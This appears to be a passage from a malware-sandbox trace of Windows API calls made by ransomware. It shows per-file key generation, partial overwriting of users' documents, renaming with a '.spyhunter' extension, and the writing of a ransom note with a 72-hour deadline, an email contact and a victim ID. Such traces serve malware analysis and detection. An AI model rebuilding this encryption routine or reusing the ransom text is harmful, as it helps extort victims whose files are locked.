(lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0148.517] WriteFile (in: hFile=0x9c, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248efd0, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248efd0*=0x2ac, lpOverlapped=0x0) returned 1 [0148.517] CloseHandle (hObject=0x9c) returned 1 [0148.517] GetProcessHeap () returned 0x2c0000 [0148.517] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f2f4d0 | out: hHeap=0x2c0000) returned 1 [0148.517] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ef70 | out: pbBuffer=0x248ef70) returned 1 [0148.517] GetProcessHeap () returned 0x2c0000 [0148.517] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0148.517] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248ef68*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248ef68*=0x30) returned 1 [0148.517] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\HvczkJfW8Rl6hrZ\\nT21gnX.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\hvczkjfw8rl6hrz\\nt21gnx.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0148.518] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\HvczkJfW8Rl6hrZ\\nT21gnX.ods") returned 71 [0148.518] StrStrW (lpFirst="nT21gnX.ods", lpSrch=".txt") returned 0x0 [0148.518] GetProcessHeap () returned 0x2c0000 [0148.518] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0148.518] ReadFile (in: hFile=0x9c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248ef2c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x248ef2c*=0x22ff, lpOverlapped=0x0) returned 1 [0148.519] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffdd01, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0148.519] WriteFile (in: hFile=0x9c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x22ff, lpNumberOfBytesWritten=0x248ef2c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x248ef2c*=0x22ff, lpOverlapped=0x0) returned 1 [0148.519] GetProcessHeap () returned 0x2c0000 [0148.519] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0148.519] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0148.519] WriteFile (in: hFile=0x9c, lpBuffer=0x248ef6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248ef2c, lpOverlapped=0x0 | out: lpBuffer=0x248ef6c*, lpNumberOfBytesWritten=0x248ef2c*=0x4, lpOverlapped=0x0) returned 1 [0148.519] WriteFile (in: hFile=0x9c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248ef2c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248ef2c*=0x30, lpOverlapped=0x0) returned 1 [0148.519] CloseHandle (hObject=0x9c) returned 1 [0148.520] GetProcessHeap () returned 0x2c0000 [0148.520] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0148.520] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\HvczkJfW8Rl6hrZ\\nT21gnX.ods.spyhunter") returned 81 [0148.520] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\HvczkJfW8Rl6hrZ\\nT21gnX.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\hvczkjfw8rl6hrz\\nt21gnx.ods"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\HvczkJfW8Rl6hrZ\\nT21gnX.ods.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\hvczkjfw8rl6hrz\\nt21gnx.ods.spyhunter")) returned 1 [0148.522] GetProcessHeap () returned 0x2c0000 [0148.522] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0148.522] GetProcessHeap () returned 0x2c0000 [0148.522] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0148.522] GetProcessHeap () returned 0x2c0000 [0148.522] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c816f0 | out: hHeap=0x2c0000) returned 1 [0148.522] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ef68 | out: pbBuffer=0x248ef68) returned 1 [0148.522] GetProcessHeap () returned 0x2c0000 [0148.523] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0148.523] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248ef60*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248ef60*=0x30) returned 1 [0148.523] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\HvczkJfW8Rl6hrZ\\l-K7bg00XYhN89HpN9k.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\hvczkjfw8rl6hrz\\l-k7bg00xyhn89hpn9k.ots"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0148.523] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\HvczkJfW8Rl6hrZ\\l-K7bg00XYhN89HpN9k.ots") returned 83 [0148.523] StrStrW (lpFirst="l-K7bg00XYhN89HpN9k.ots", lpSrch=".txt") returned 0x0 [0148.523] GetProcessHeap () returned 0x2c0000 [0148.523] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0148.523] ReadFile (in: hFile=0x9c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248ef24, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248ef24*=0x2800, lpOverlapped=0x0) returned 1 [0148.524] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0148.524] WriteFile (in: hFile=0x9c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248ef24, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248ef24*=0x2800, lpOverlapped=0x0) returned 1 [0148.524] GetProcessHeap () returned 0x2c0000 [0148.524] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0148.524] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0148.524] WriteFile (in: hFile=0x9c, lpBuffer=0x248ef64*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248ef24, lpOverlapped=0x0 | out: lpBuffer=0x248ef64*, lpNumberOfBytesWritten=0x248ef24*=0x4, lpOverlapped=0x0) returned 1 [0148.525] WriteFile (in: hFile=0x9c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248ef24, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248ef24*=0x30, lpOverlapped=0x0) returned 1 [0148.525] CloseHandle (hObject=0x9c) returned 1 [0148.525] GetProcessHeap () returned 0x2c0000 [0148.525] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0148.525] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\HvczkJfW8Rl6hrZ\\l-K7bg00XYhN89HpN9k.ots.spyhunter") returned 93 [0148.525] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\HvczkJfW8Rl6hrZ\\l-K7bg00XYhN89HpN9k.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\hvczkjfw8rl6hrz\\l-k7bg00xyhn89hpn9k.ots"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\HvczkJfW8Rl6hrZ\\l-K7bg00XYhN89HpN9k.ots.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\hvczkjfw8rl6hrz\\l-k7bg00xyhn89hpn9k.ots.spyhunter")) returned 1 [0148.526] GetProcessHeap () returned 0x2c0000 [0148.526] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0148.526] GetProcessHeap () returned 0x2c0000 [0148.526] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0148.526] GetProcessHeap () returned 0x2c0000 [0148.526] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f635e8 | out: hHeap=0x2c0000) returned 1 [0148.526] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ef68 | out: pbBuffer=0x248ef68) returned 1 [0148.526] GetProcessHeap () returned 0x2c0000 [0148.526] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0148.526] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248ef60*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248ef60*=0x30) returned 1 [0148.526] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\HvczkJfW8Rl6hrZ\\h8zmgjQBy1zUNE.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\hvczkjfw8rl6hrz\\h8zmgjqby1zune.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0148.527] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\HvczkJfW8Rl6hrZ\\h8zmgjQBy1zUNE.xls") returned 78 [0148.527] StrStrW (lpFirst="h8zmgjQBy1zUNE.xls", lpSrch=".txt") returned 0x0 [0148.527] GetProcessHeap () returned 0x2c0000 [0148.527] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0148.527] ReadFile (in: hFile=0x9c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248ef24, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248ef24*=0x2800, lpOverlapped=0x0) returned 1 [0148.527] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0148.527] WriteFile (in: hFile=0x9c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248ef24, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248ef24*=0x2800, lpOverlapped=0x0) returned 1 [0148.528] GetProcessHeap () returned 0x2c0000 [0148.528] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0148.528] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0148.528] WriteFile (in: hFile=0x9c, lpBuffer=0x248ef64*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248ef24, lpOverlapped=0x0 | out: lpBuffer=0x248ef64*, lpNumberOfBytesWritten=0x248ef24*=0x4, lpOverlapped=0x0) returned 1 [0148.528] WriteFile (in: hFile=0x9c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248ef24, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248ef24*=0x30, lpOverlapped=0x0) returned 1 [0148.528] CloseHandle (hObject=0x9c) returned 1 [0148.528] GetProcessHeap () returned 0x2c0000 [0148.528] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0148.528] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\HvczkJfW8Rl6hrZ\\h8zmgjQBy1zUNE.xls.spyhunter") returned 88 [0148.528] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\HvczkJfW8Rl6hrZ\\h8zmgjQBy1zUNE.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\hvczkjfw8rl6hrz\\h8zmgjqby1zune.xls"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\HvczkJfW8Rl6hrZ\\h8zmgjQBy1zUNE.xls.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\hvczkjfw8rl6hrz\\h8zmgjqby1zune.xls.spyhunter")) returned 1 [0148.529] GetProcessHeap () returned 0x2c0000 [0148.529] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0148.529] GetProcessHeap () returned 0x2c0000 [0148.529] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0148.529] GetProcessHeap () returned 0x2c0000 [0148.529] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f2f3e8 | out: hHeap=0x2c0000) returned 1 [0148.529] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ef60 | out: pbBuffer=0x248ef60) returned 1 [0148.529] GetProcessHeap () returned 0x2c0000 [0148.529] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0148.529] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248ef58*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248ef58*=0x30) returned 1 [0148.529] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\HvczkJfW8Rl6hrZ\\bSoQZij54xq9.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\hvczkjfw8rl6hrz\\bsoqzij54xq9.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0148.530] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\HvczkJfW8Rl6hrZ\\bSoQZij54xq9.pdf") returned 76 [0148.530] StrStrW (lpFirst="bSoQZij54xq9.pdf", lpSrch=".txt") returned 0x0 [0148.530] GetProcessHeap () returned 0x2c0000 [0148.530] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0148.530] ReadFile (in: hFile=0x9c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248ef1c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248ef1c*=0x2800, lpOverlapped=0x0) returned 1 [0148.531] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0148.531] WriteFile (in: hFile=0x9c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248ef1c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248ef1c*=0x2800, lpOverlapped=0x0) returned 1 [0148.531] GetProcessHeap () returned 0x2c0000 [0148.531] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0148.531] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0148.531] WriteFile (in: hFile=0x9c, lpBuffer=0x248ef5c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248ef1c, lpOverlapped=0x0 | out: lpBuffer=0x248ef5c*, lpNumberOfBytesWritten=0x248ef1c*=0x4, lpOverlapped=0x0) returned 1 [0148.531] WriteFile (in: hFile=0x9c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248ef1c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248ef1c*=0x30, lpOverlapped=0x0) returned 1 [0148.531] CloseHandle (hObject=0x9c) returned 1 [0148.531] GetProcessHeap () returned 0x2c0000 [0148.531] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0148.531] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\HvczkJfW8Rl6hrZ\\bSoQZij54xq9.pdf.spyhunter") returned 86 [0148.532] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\HvczkJfW8Rl6hrZ\\bSoQZij54xq9.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\hvczkjfw8rl6hrz\\bsoqzij54xq9.pdf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\HvczkJfW8Rl6hrZ\\bSoQZij54xq9.pdf.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\hvczkjfw8rl6hrz\\bsoqzij54xq9.pdf.spyhunter")) returned 1 [0148.532] GetProcessHeap () returned 0x2c0000 [0148.532] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0148.532] GetProcessHeap () returned 0x2c0000 [0148.532] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0148.532] GetProcessHeap () returned 0x2c0000 [0148.532] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f2f300 | out: hHeap=0x2c0000) returned 1 [0148.532] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ef60 | out: pbBuffer=0x248ef60) returned 1 [0148.532] GetProcessHeap () returned 0x2c0000 [0148.533] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0148.533] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248ef58*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248ef58*=0x30) returned 1 [0148.533] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\HvczkJfW8Rl6hrZ\\3UWXy.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\hvczkjfw8rl6hrz\\3uwxy.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0148.533] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\HvczkJfW8Rl6hrZ\\3UWXy.docx") returned 70 [0148.533] StrStrW (lpFirst="3UWXy.docx", lpSrch=".txt") returned 0x0 [0148.533] GetProcessHeap () returned 0x2c0000 [0148.533] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0148.533] ReadFile (in: hFile=0x9c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248ef1c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248ef1c*=0x2800, lpOverlapped=0x0) returned 1 [0148.534] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0148.534] WriteFile (in: hFile=0x9c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248ef1c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248ef1c*=0x2800, lpOverlapped=0x0) returned 1 [0148.534] GetProcessHeap () returned 0x2c0000 [0148.534] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0148.534] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0148.534] WriteFile (in: hFile=0x9c, lpBuffer=0x248ef5c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248ef1c, lpOverlapped=0x0 | out: lpBuffer=0x248ef5c*, lpNumberOfBytesWritten=0x248ef1c*=0x4, lpOverlapped=0x0) returned 1 [0148.534] WriteFile (in: hFile=0x9c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248ef1c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248ef1c*=0x30, lpOverlapped=0x0) returned 1 [0148.534] CloseHandle (hObject=0x9c) returned 1 [0148.534] GetProcessHeap () returned 0x2c0000 [0148.535] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0148.535] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\HvczkJfW8Rl6hrZ\\3UWXy.docx.spyhunter") returned 80 [0148.535] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\HvczkJfW8Rl6hrZ\\3UWXy.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\hvczkjfw8rl6hrz\\3uwxy.docx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\HvczkJfW8Rl6hrZ\\3UWXy.docx.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\hvczkjfw8rl6hrz\\3uwxy.docx.spyhunter")) returned 1 [0148.535] GetProcessHeap () returned 0x2c0000 [0148.535] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0148.535] GetProcessHeap () returned 0x2c0000 [0148.535] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0148.535] GetProcessHeap () returned 0x2c0000 [0148.535] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c81618 | out: hHeap=0x2c0000) returned 1 [0148.536] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\H7JtTIBNSFLZqk55slr8\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\h7jttibnsflzqk55slr8\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0148.536] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0148.536] WriteFile (in: hFile=0x9c, lpBuffer=0x248ee8f*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248efb8, lpOverlapped=0x0 | out: lpBuffer=0x248ee8f*, lpNumberOfBytesWritten=0x248efb8*=0x127, lpOverlapped=0x0) returned 1 [0148.537] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0148.537] WriteFile (in: hFile=0x9c, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248efb8, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248efb8*=0x2ac, lpOverlapped=0x0) returned 1 [0148.537] CloseHandle (hObject=0x9c) returned 1 [0148.537] GetProcessHeap () returned 0x2c0000 [0148.537] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f63e58 | out: hHeap=0x2c0000) returned 1 